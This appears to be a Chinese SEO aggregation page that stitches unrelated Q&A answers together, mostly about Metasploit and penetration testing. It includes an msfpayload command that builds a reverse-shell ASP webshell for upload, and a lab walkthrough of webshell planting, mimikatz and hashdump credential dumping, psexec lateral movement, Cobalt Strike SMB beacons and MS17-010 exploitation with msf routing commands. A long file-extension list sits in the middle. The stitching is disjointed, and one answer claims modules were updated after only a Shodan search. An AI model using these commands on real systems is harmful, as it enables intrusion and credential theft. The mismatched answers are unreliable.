本文目录一览:
- 1、msf生成的webshell在哪个文件夹
- 2、后缀为PHP的文件如何打开?
- 3、关于kali下msf生成payload的LHOST问题,求解答
- 4、内网渗透--对不出网目标的打法
- 5、msfvenom怎么生成php
- 6、怎样更新metasploit中的模块
msf生成的webshell在哪个文件夹
可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
产生webshell
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
然后将此webshell上传到服务器(这个步骤要有上传权限。)
后缀为PHP的文件如何打开?
*.php是一种网络开发的程序,它在服务器端运行,也就是你如果想打开此文件(以网页的形式),必须为他配一台服务器或者安装一个基于本机的服务性质的软件!
*.php是一种网络开发的程序,它在服务器端运行,也就是你如果想打开此文件(以网页的形式),必须为他配一台服务器或者安装一个基于本机的服务性质的软件,不过你可以使用写字板之内的东西打开他,此时你看到的是源程序,如果是在网上下载的php的话,他已经在服务器端运行,你只能看到结果!即我们常见的超文本html。
后缀名大全
A:
1 .ace: ace.exe或winace生成的压缩文件
2 .ain: ain是一种压缩文件格式,解开ain需要用ain.exe。在网上可以找到。
可以在各大的FTP pub/msdos utility之类地方寻找ain.exe
3 .arj,a01,a02...:
arj是一种非常常见的压缩文件格式,它可以支持带目录,多文件压缩,
一般FTP中DOSutility目录下都可以找到arj.exe,一般的版本有2.4
2,2.382.50等,其文件格式是通用的,不存在格式不认问题。
a01,a02,a03是arj在多文件压缩时后面文件的缺省文件名。
展开arj文件可以用arj x -va -y filename.arj
在windows下可以试试用winzip展开。
4 .asp:
.asp文件通常指的是Active Server Pages文件,这个文本文件可以
包括下列部分的任意组合:文本/HTML 标记/ASP 脚本命令,可以用
ie浏览器直接打开,也可以用记事本打开编辑。
.asp文件也可能是一种文档格式的文件,可以用cajviewer打开。
5 .avi:
一般用windows自带的媒体播放器就可以播放。
如果没有图象只有声音,则可能是mpeg4格式,需要装插件。
如果有单独的字幕文件,则可以用其它播放器。
B:
1 .BHX(BINHEX):
BinHex是苹果机器的一种编码方式.
WinZip可以解码. 将email以文本方式存盘,扩展名为.BHX,
就可以直接用WinZip解压了.
2. .bin
光盘映象文件,可以:
a.用Bin2ISO将bin转成ISO文件,然后用WinImage解开.
注意:有些BIN文件实际上就是ISO文件如果上面的办法有问题
可以直接将后缀改成iso,然后用WinImage解解看
b.用ISOBuster直接解BIN.
c.用daemon直接将BIN文件虚拟成光驱
C:
1 .caj: cajviewer,CAJ文件浏览器是中国学术期刊(光盘版)电子杂志社(CAJEJPH)
的产品。它是为中国期刊网()的全文检索,浏览开发的。
2 .cdi: 光盘映像文件,用DISKJuggle 就可以打开
3 .cdr: CorelDraw
4 .cdp: Nti CdMaker做的光盘Image.用 Nti CdMaker 的FileCopy刻.
5 .cfm:
www浏览器(服务器支持,类似asp,php,jsp) or 文本编辑器看源码
6 .chi:chm(html help)的索引,和chm文件一起使用
7 .chm:
基于Html文件格式的帮助文档,在IE4.0以上可以双击直接打开。
制作工具可以采用Html Help WorkShop。
8 .cif:是easy cd creator地image文件
9 .cpj:
WinONCD的工程文件,不过如果那个Raw文件是2072字节的扇区的话就是标准的ISO文件
换个扩展名,用什么刻录软件都可以,最差用WinImage直接展开安装也行。
10 .cpx: cpx是一种压缩过的矢量图格式,CorelDraw
D:
1 .dat:
一般指数据文件,比如某些音碟或者某些应用程序的数据。
是个很通用的扩展名(比如影碟,一般数据,......),无法判断用那个程序打开,
除非有更多信息,比如这些文件是做什么用的。
是某个软件附带的,还是独立存在的,等等。
2 .dbf:
DOS下:
foxbase
foxpro
DN 中F3(view)
Windows:
qview(快速查看)
FoxPro
Office中Excel等.
3 .ddi: DISKDUPE,unimg,unddi,undisk
4 .dvi: Latex处理过的文件,用任何一种Latex软件都可看它。
5 .dxf: AutoCad,3DMax
6 .dxr: Macromedia Director Protected Movie File
E:
1 .ecw: 有可能是ENSONIQ AudioPCI声卡的波表样本
2 .emf: 扩展的wmf文件
3 .eml: outlook express
4 .eps:
eps是一种特殊的ps文件, 通常是嵌入其他文档中使用. 制作这种文件非常简单:
a) 在Windows中安装一台PostScript打印机(并不是真的要买一台, 仅仅是安装驱动
程序), 例如 HP LaserJet 5P/5MP PostScript, 设置其属性中的PostScript输出格式为
内嵌的PostScript, 打印端口设为FILE(在磁盘上创建文件);
b) 在任何绘图软件中编辑好图形后, 在打印对话框中将打印机设为那个PostScript
打印机, 然后打印到文件, 文件名可取为xxx.eps, 这将是你所需要的eps文件.
很多常用软件,比如ACDSee、Word等都可打开eps文件。
F:
1 .fcd:用vitrul CD-ROM打开
2 .fla: Flash
G:
1 gerber file(.dat .rep .pho 文件): 电路图可以送去制板的
2 .gif: gif是一种很普遍的图像格式,用几乎所有的图像处理软件都可以处理gif。
3 .gtp:guitar pro
.gtp是2.2以下版本的,3.0版本的是.gp3
H:
1 .hlp: 编辑可用help magic,help scribe
2 .hqx:
hqx格式就是所谓的Binhex 4.0文件。
实际是Ascii文件。
在PC上可以用winzip 6.2以上解开。
在Mac机上,如果你用Fetch 2.0以上来传
(在随机的Apple Internet Connect Kit上已带)
可以自动转成原来的Binary文件。
一般来说,你down了hqx格式的文件在PC上是派不上
什么用场的,当然你可以用来和别人交换word文件什么的。
I:
1 .icl:Icon Library,用AxIcons打开,一个专用的画图标的软件。
2 .ic图标文件,可以用acdsee转成bmp文件。
3 .idx:cterm非常下载下来的文件索引,用cterm自带的indexread打开
4 .iges:iges是一个基于NURBS的文件格式, 可以用AutoCad打开,如果不行,可以可以先拿到rhino中转成DXF
5 .img:
img是软盘image文件,一个img就是一个软盘,尼需要一个工具将这样
的文件展开还原到软盘上,就是hd-copy,
6 .is
一般是光盘镜像,直接用来刻盘或者用winimage解开
也可以装一个虚拟光盘软件daemon直接将之虚拟成光盘。
J:
1、.jpg,.jpeg:
.jpg是一种高压缩比的真彩图像文件格式,一般的图像处理软件都可以
显示jpg图像。推荐使用的看jpg程序有:在DOS下sea,在windows下用
acdsee,在UNIX下可以用xv来看jpg。
K:
1、.kc:
可以用kingcopy打开。
L:
1 .lwp: Lotus WordPro 格式
2 .lrc: 一个winamp插件的歌词文件,可以在放mp3时显示歌词。以前叫lrics mate
3 .lzh:
lzh是很老的一种压缩文件格式,近几年已经很少用了,展开lzh
文件需要lha.exe,在FTP的DOS utility目录下应该有。
好象以前有一种自解压然后运行的exe是用lha压的,lzh用winrar就能解
4 .ldb
Access数据库锁定文件,纪录数据库的锁定信息,
比如是否被打开,是否以独占形式访问等等。
M:1 .max: 3DMax文件。
2 .mdb: Microsoft Access数据库文件
3 .mdl: Rose文件
4 .mif:一种是MaxPlusII的文件
5 .mov:电影文件,用Quicktime打开。
6 .mpp:Project File(Ms Project)
7 .msf:
part 1:文件头,我见到的几个都是mstor打头的,文件头包括版本信息、注册表
的一些键值、图片的位置信息等等,关系不是很大,不必仔细研究。
part 2: 图片序列,图片都是jpeg格式的,每张图片的头可以通过查找"JFIF"字符串查到,查到后一定要后退六个字节,才是真正的jpeg文件头。也就是说
jpeg文件的第七到第十个字节是"JFIF"。每两张图片之间会有大量的字节
填充0,中间你会找到屏保运行时产生的临时文件的名字,如c:\1.jpg;
由于jpg文件不校验字节和长度的,你可以随便取到临时文件名上面的哪个
0 上。把之间的部分拷贝出来另存为.jpg文件就可以了,
part 3:图片都取出来了,还管它干什么,呵呵
7 .msi:
MS Windows的新的安装文件标准。已经在Office2000和Windows2000中采用。
98或NT下,可以装下面的软件:InstMsi9x.exe,InstMsiNT.exe
N:
1 .nb:Mathematica的一种文件格式把。
2 .nf
察看方法:
1.文本编辑器都可以看。建议将自动换行设为80列。
专门的查看软件:
NFOShow1.1是网友写的,实际效果是我见过最好的,不过有时copy时会出错退出。DAMN.NFO.Viewer.v2.0只有几十k,很好用,足够了。还可以在dos窗口下type xx.nfo
3 .ngp,.ngc:
是模拟器游戏的文件neopocott 0.35b(ngp模拟器)ngp模拟器neopocott升级到
了v0.35b版本,可在win9x, 2k, me平台上运行。新版本暂停功能得到修改,支持
了ngc的扩展名文件,可以更好的存储和读取文件,增加了对键盘的设置等等
4 .njx: 南极星的字处理软件的文档格式
5 .nrg:Nero做的CD Image,用nero直接打开刻盘即可
1 .opx: Microsoft 组织结构图,用office自带的组件可以打开,
默认不安装,需要添加程序。
P:
1 .pdf:
pdf是adobe公司开发的一种类似于poscript的文件格式。可以用
adobe的acrobat,arcrbat reader来编辑,打开pdf文件
2 .pdg:超星阅读器SSreader3.52以上版本
3 .phtml:cajviewer
4 .pl: 一般说来是PERL Script,也可能是mp3播放软件的playlist文件
5 .ppt .pps:PowerPoint
6、prn:
prn文件是打印机文件,比如你在Word中选择"打印到文件"就会生成这种文件。
你可以把扩展名改为ps,然后用GSView打开。
或者用PrFile这个软件直接把prn文件送到PS打印机打印出来。
7 .ps:
ps的意思是PostScript,这是一种页面描述语言,主要用于高质量打印。
在UNIX和windows下都可以用GhostView来看ps文件。其homepage是
如果你有PoscriptScript支持的打印机,可以直接打印PS文件。
如果你想制做PS文件,简单的办法是:在Windows下安装一个支持Post Script
的打印机驱动程序,比如HP 4 PS,你不需用非有这个打印机安装在你的机器上。安装好
驱动之后,在WIndows下任何一个编辑器中编辑好你需要转成PS的文件,比如从
Word下。然后选择"打印",选择那个PS兼容的驱动程序,然后选择"print to file",
它将把打印输出送到一个文件中去。因为你用了一个Poscript 的打印驱动程序,
那么这个打印文件就是PostScript文件了。将该文件改名字为XXX.ps就可以了。
8 .ps.gz:
gzipped postsript 文件,可以用gsview直接打开,其支持gzip
如果是用IE下载的,有可能实际已经解开,可以去掉gz后缀试试。
9 .psz: 改成*.ps.gz试试,然后用gzip或者winzip解开就是.ps文件了
10 .psf: outline PostScript printer font (ChiWriter)
11 .ptl: AUTOCAD做出来的打印文件
Q:
R:
1、.rar,.r01,r02......:
rar是一种压缩文件格式,在DOS下解开RAR可以用rar.exe,在各大FTP
里面都可以找到,一般在pub/msdosutility之类地方。需要注意的是rar
高版本压缩的文件低版本不认。当前最新的rar for DOS是2.X版,如果
能找到2.x版的话最好不要用1.X板的rar,2版的rar文件相互是通用的。
rar的命令行参数几乎和arj一样,rar x -v -y filename.rar
可以展开文件,包括带目录和多文件压缩。
rar多文件压缩时rar之后的文件名是r00,r01,r02....
DOS下的软件不支持长文件名,所以如果你的rar里面有长文件名并且因为
在DOS下展开丢失了得话,可以试试winrar for win95,支持长文件名。
在各大ftp上应该也可以找到。其所有版本都可以认rar2.X得文件。
2、.raw:
是easy cd或者winoncd等软件做的CDROM的ISO镜像
RAW属于MODE1的
3、.raw:
可用Photoshop看。
4、.rom:
是很小的音乐压缩格式,使用realplayer可以播放。
5、.rom:
是模拟器的文件吧。
6、.rpm:
RPM 是Redhat Package Manager 的简写。
是Linux 底下的软件包管理系统。
到Linux 底下用使用rpm 来对它进行操作。
7、.rm:
RM文件是一个包含了RA文件URL地址的文件,作用就同M3L与MP3一样,用于
REALPLAYER在INTERNET上播放RA流。
8、.rmx:
可以用realplayer 打开。
9、.rtf:
rich text format
包含格式的文本,可用于各种编辑器间交换文件,但是体积要比专用格式大很多。 可以用word,写字板打开,一般的支持格式的编辑器都能打开。
S:
1、.sfe:file split 分割文件。
用file split 可以把他们合并成原来的zip文件。
或许还有自动合并得bat文件呢。
2、.sfv:
不是文件分割器产生的,是sfv32w产生的,一般用来做windows下的文件校验。
3、.shar:
Shell Archive, 文本格式的打包文件,类似tar, 不过tar生成的为binary file,在UNIX下sh *.shar 即可解包, 或用专门的 shar/unshar utilities。
4、.shg:
是microsoft的help workshop的图形处理工具生成的图形文件,
是用来在help中调用的。
5、.sit:
Macintosh Stuffit archives,
as well as UUE (uuencoded), HQX (BinHex), bin (MacBinary), ZIP, ARC,
ARJ, and GZ archives
use "Aladdin Expander" to expand
6、.srm:
呵呵,当然是用Kiven电子书库了.你可以去化云坊down 3.0.12的版本,也可以去 kiven的主页上当最新版.还有源码的呦.
7、.stx:
Syntax file of Edit Plus
8、:
是Flash的动画格式,如果浏览器装了插件,可以用浏览器打开,但最好用
Flash Player Browser打开。
9、.swp:
Scientific Word Place
10、.spw
SigmaPlot Worksheet
T:
1、.tar.GZ or .tar:
.tar.gz,或者.tgz的文件一般是在UNIX下用tar和gunzip压缩的文件。
可能的文件名还有.tar.GZ等。gunzip是一种比pkzip压缩比高的压缩 程序,一般UNIX下都有。tar是一个多文件目录打包器,一般也是在unix下。
在UNIX下展开.tar.gz文件用tar zxvf filename.tar.gz就可以了 或者用gunzip -d filename.tar.gz得到filename.tar 然后用tar xvf filename.tar解包,两步完成。
在PC环境下解tgz,可以用winzip 6.2以上版本,可以直接打开extract。
建议在win95或者NT下使用winzip,因为很多这样的文件都是在UNIX下压缩的,
很可能有长文件名,但是WIndows3.1是不支持长文件名的,however,win31下的winzip 也是应当可以展开tgz的。
2、.tar.Z:
.Z的文件一般是在UNIX下用compress命令压缩的。在UNIX下解开可以用 uncompress filename.Z。在PC下可以用winzip6.2以上版本,建议使用
win95版本的winzip,因为win31不支持长文件名,而UNIX下的文件很
可能是长文件名。但win31下winzip应该也可以解开。
如果是.tar.Z的文件的话可以用uncompress先解开外面一层,然后用
tar xvf filename.tar解开tar文件。在PC下还是用winzip。
3、.tex:
.tex本身是个文本文件,必须经过编译成dvi文件,使用winLatex就可以,如果你有 unix当然会带TeX或LaTex的。
U:
1、.ufo:
问:这种文件要用什么程序打开?quick view plus 可以吗?
答1:使用photoimpact应该可以.
答2:通常是漫画,可以用冷雨浏览来看.
答3:找ufo2jpg.exe可以将ufo文件变成熟悉的JPG
2、.uu,.uue:
.uu是uucode的文件。uucode是一种把8bit文件转成7bit的算法。
我们知道,exe文件或者其他二进制文件是不可以直接用email
发出去的。uucode可以把这些文件转成7bit格式,就是普通文本文件格式
(如下面的样子),然后就可以被接收方还原。
begin 640 pass
M("$Y-2V]R5!1=UI!.C`Z,#I3=7!E`@F]O=#IB$Y-2V]R5!1=UI!.C`Z,#I3=7!EBU5V5R.B\Z+V)I;B]C
MV@@WES861M.BHZ,#HP.E-YW1E;2!6"B`@(=U97-T.F-U-I)=M%9HN
M:S(Z.3DX.CDY.#I'=65S="!!8V-O=6YT.B]UW(O5OQE+V=U97-T.B]B
如果你收到一个email是uucode做的,可以把它存成一个文件,将begin 640..
之前的部分删除,然后改文件名为.uu,然后用uudecode解开。
在windows下可以用winzip6.2以上版本。
V:
1、.vcd:
一般是virtual driver的虚拟光驱文件
也可以转换成iso,用daemon打开,参见格式转换,.vcd-.iso
另外金山影霸的文件也可能是vcd。
2、.vcf:
是地址本文件,用outlook express可以打开,(双击就可以)。
3、.vob:
DVD数据文件
4、.vos:
VOS 是一款强大的电子琴模拟软件,.vos文件可以用它打开。
5、.vqf:
用Winamp播放,需要装相应的插件。
备注:VQF是YAMAHA公司和日本NTT公司联合开发的一种新音乐格式,它的压缩比比MP3更高,音质却与MP3不相上下,而它之所以没有MP3那般出尽风头,大概与其推出时间较迟以及缺和相应的广告宣传有关吧,加之其播放、制作工具目前还不是很丰富,所以知道的人不是很多。但不管怎么说,VQF的确是一种优秀的音乐压缩格式。常见播放工具有Yamaha VQ Player等等。
6、.vsd:
visio画的流程图
7、.vss:
visio template file
W:1、.wdl:
Dynadoc,华康文件阅读器 可用dynadoc 或 FPread32.exe为关键字在ftp搜索引擎搜索。
2、.wmf:
WINDOWS的图元文件,用ACDSEE可以看,WORD也可以打开。
3、.wpd:
WPD是corel公司的wordperfect字处理软件的文档的扩展名。
4、.wsz:
winamp的skin,down下来以后是wsz格式ws打开一个winzip先,然后用winzip里的open。。。。。。。
X:
1、.xls:
MicroSoft Excel的文件。
2、.xml:
eXtensible Markup Language
SGML的一个子集, 1998年2月正式发布1.0版
目前IE5.0可支持,可以在IE5.0下浏览.xml文件,但同时必须有相应的.xsl文件
才能正常显示。
Y:
......
Z:
1、.zip:
zip是一种最常见的压缩格式,在UNIX下解开zip用unzip命令。
在PC下解开zip可以用pkunzip.exe,一般在大ftp里面都可以找到,
或者用winzip解开。pkunzip -d filename.zip可以带目录结构解开文件
关于kali下msf生成payload的LHOST问题,求解答
msf的payload中能建立反弹shell的,比如reverse_tcp,像是windows/meterpreter/reverse_tcp或者是android/meterpreter/reverse_tcp,它们的LHOST参数(LHOST就是Local host的意思)是攻击方的IP地址,用来监听对方的连接的。其实很好理解,反弹shell嘛,就是建立反弹连接的,当然是反弹到攻击主机了。
如果不是建立反弹shell的payload,一般是没有LHOST的,取而代之的是RHOST参数,是目标主机的IP地址。
内网渗透--对不出网目标的打法
配置网络
在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下:
win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。
外网打点
在win7这台靶机上,使用PHPStudy让网站可以运行起来。在攻击机上,访问 可以看到是一个phpStudy 探针。对这网站进行渗透,因为本文主要写在内网渗透过程中对不出网主机的渗透,所以此处外网打点就不写的很详细了。
针对此靶场进行外网渗透拿权限大致有这几种方法:
通过phpmyadmin弱口令,进入phpmyadmin后台。然后知识点就变成了,通过phpmyadmin进行getshell,这个点又分为,得到网站绝对路径后,使用select into outfile的方式写shell和利用日志写shell。在此处,我是使用日志写shell的方法拿到权限。因为secure_file_priv配置为null,禁止修改目录下的文件,也就不能使用into outfile的方式写入shell。
通过目录扫描可以扫出beifen.rar,备份文件。在源码中可以找到登陆后台的账号密码:admin/123456和登陆路径/index.php?r=admin,在前台模板文件中添加一句话木马连接也可获取shell。
获得webshell的信息收集
通过外网打点获得的webshell,可以进行一波信息收集,摸清我是谁?我在哪?有没有内网环境?有没有杀软?通过拿到webshell后的信息收集的结果来评估一下有没有必要继续深入或者初步了解继续深入的话需要哪些手段。
我是谁?
蚁剑已经给出基础信息
我在哪?
使用ipconfig /all 看一下网络信息
目标有两个网卡,并且存在域环境,那么就有打它内网的必要了。
有没有杀软?
tasklist查看一下进程信息
根据进程查一下是否有杀软
目标没有使用杀软,还有域环境那么让它直接cs上线。
内网渗透
cs上线
内网信息收集
信息收集每个人都有自己的习惯,信息收集的顺序和信息收集的项目也都不太一样,只要根据自己的习惯和嗅觉,针对目标具体情况进行收集,以求尽快的拿下目标就好。信息收集的越全面突破口也就会越多,考虑到篇幅和文章内容匹配度等因素,此处并没有写出大量信息收集方法。
使用cs自带的net view查看域信息。
使用cs自带功能进行端口扫描,分别对8和52两个网段进行扫描进行完这两个步骤以后,cs会把扫到的目标列出来。
因为拿到的是管理员权限,可以先抓一波密码。用 cs 的 hashdump 读内存密码,用 mimikatz 读注册表密码:logonpasswords。
此处打码的地方是因为配置靶机登陆时靶机提示重置密码,我给靶机改了个包含个人信息的密码。蠢哭。拿到密码后,目标主机没有开启防火墙,可以使用cs自带的psexec做一波横向,因为抓到很多域中机器密码,域控密码也抓到了。
内网横向(通过登录凭证)
这个靶机设置的比较简单,抓到密码后,因为抓到了域控登陆的凭证,那么使用psexec即可横向内网所有机器。因为,另外两台内网的机器不出网,那么就到了本文着重练习的点了,打不出网的机器。
不出网机器上线一般有以下几种方式:
使用smb beacon
配置listener通过HTTP代理上线
使用pystinger搭建socks4代理
这几种方式之前有师傅也在先知写过 《不出网主机上线方法》 。此处我采用的SMB beacon这个方法。
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 PsExec 或 Stageless Payload 上线。
首先得到内网中一台主机的beacon,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用Smb beacon使目标主机上线
使用条件
具有 SMB Beacon 的主机必须接受 445 端口上的连接。
只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
利用这种beacon横移必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。
使用方法:
1.建立smb的listener
2.在cs中使用psexec进行横向移动,选择现有的beacon作为跳板,这里凭据必须是administrator ,即拥有目标主机管理员权限
3.连接成功,可以看到smb beacon上线的主机右侧有∞∞标识
使用这种方法上线的机器,主要是通过出网机作为一个中间人,不出网主机成功上线后,如果出网机一断开,这个不出网主机也会断。
内网横向(通过ms-17010)
在拿下win7的时候,可以给它传一个fscan,给win7做一个内网大保健。上传fscan后,运行扫一下内网。
发现存在ms17010。
ms17010常见的几种打法:
msf
ladon/ladon_ms17010
从msf分离出的exe
nessus里的exe
cs插件
这几种打法,我在这个环境中都做过尝试。过程就不一一叙述了,直接说我测试的结果。msf是最稳定的,但是打起来有稍许的麻烦因为要设置监听模块和选择攻击模块等配置。ladon_ms17010方便但是不太稳有时候会打不成功。cs插件也不稳,并且在这种不出网网络不稳定的情况下成功率会变的更低。
这个图片的ip可能跟上边配置符不起来,因为我在测试过程中,网断过几次,ip就变了。所以,在打的时候,如果ladon和分离出的exe没有打成,不要轻易放弃,用msf在打打试试,毕竟工具就是工具,不能过分依赖某个工具。
在这种不出网的情况下,可以优先考虑使用从msf分离出的exe和ladon_ms17010来打,打成功会直接通过自定义的dll新建一个用户并加入管理员组,开启3389端口。根据实际情况,可考虑在合适的时间段和条件下直接远程登入,翻一下敏感数据,往往会因为运维人员的很多“好习惯”而给渗透带来很多便利,比如说“密码本.txt”。
msf打不出网机器的ms17010
msf在单兵作战的时候还是很稳定很香的。首先,让出网机器先在msf上线,可以用cs直接传递会话,或者生成个msf马直接运行一下。在这的方法就很多了。win7在msf上线后,因为我们已经提前知道了,存在52这个不出网的段,那么就需要在msf中添加路由。
查看路由
run get_local_subnets
添加路由
run autoroute -s 192.168.52.0/24
查看添加的路由
run autoroute -p
把shell切换到后台,然后使用ms17010模块进行漏洞利用,监听时使用正向监听,即可
小贴士:
漏洞检测方法:
use auxiliary/scanner/smb/smb_ms17_010
之后设置一下目标ip和线程即可,这里因为已经扫出存在漏洞的机器了,也就不在叙述。
漏洞利用常使用的是:
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec
这里的第一个和第三个模块需要目标开启命名管道,并且比较稳定。第二个模块只要存在漏洞即可,但是会有概率把目标打蓝屏,而且杀软拦截也会比较严格,如果有杀软就基本可以放弃这个模块了。
在打ms17010的时候,不妨使用auxiliary/admin/smb/ms17_010_command模块探测一下是否可以使用命名管道。
use auxiliary/admin/smb/ms17_010_commandsetrhosts192.168.164.156192.168.164.161setcommandtasklistshow optionsrun
如果命令执行成功的话就可以优先考虑
auxiliary/admin/smb/ms17_010_commandexploit/windows/smb/ms17_010_psexec
这两个模块进行利用。
我在上边打得时候因为目标机器没有杀软就直接使用exploit/windows/smb/ms17_010_eternalblue来打了,期间为了测试打过多次,确实出现了把目标机器打重启的情况。
总结
这个靶场设计的技能点比较基础,外网打点获得shell后,直接可以通过cs上线,在管理员权限下,抓取密码,新建一个smb beacon然后使用psexec对内网两台不出网的机器进行横向。
msfvenom怎么生成php
metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom。
正所谓万变不离其宗,了解原理是最重要的。
现在,metasploit-framework完美搭档是msfvenom+msfcosole
下面,我们就来看一下msfvenom。
root@localhost:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] var=val
Options:
-p, --payload payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled length Prepend a nopsled of [length] size on to the payload
-f, --format format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder encoder The encoder to use
-a, --arch arch The architecture to use
--platform platform The platform of the payload
--help-platforms List available platforms
-s, --space length The maximum size of the resulting payload
--encoder-space length The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars list The list of characters to avoid example: 'x00xff'
-i, --iterations count The number of times to encode the payload
-c, --add-code path Specify an additional win32 shellcode file to include
-x, --template path Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out path Save the payload
-v, --var-name name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
root@localhost:~#
一,msfvenom生成payload的常见格式为:
最简单型:
msfvenom -p payload payload options -f format -o path
1
1
编码处理型:
msfvenom -p payload payload options -a arch --platform platform -e encoder option -i encoder times -b bad-chars -n nopsled -f format -o path
1
1
注入exe型+编码:
msfvenom -p payload payload options -a arch --plateform platform -e encoder option -i encoder times -x template -k keep -f format -o path
1
1
拼接型:
msfvenom -c shellcode -p payload payload options -a arch --platform platform -e encoder option -i encoder times -f format -o path
1
1
-o输出参数可以用“”号代替
-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe
[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]
怎样更新metasploit中的模块
1、打开msf,输入命令use auxiliary/gather/shodan_search。
2、然后输入show options看看有哪些需要设置。
3、设置查询语句set QUERY "webcamxp"。
4、run查看结果。
5、发现已经更新成功了。
注意事项:
Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。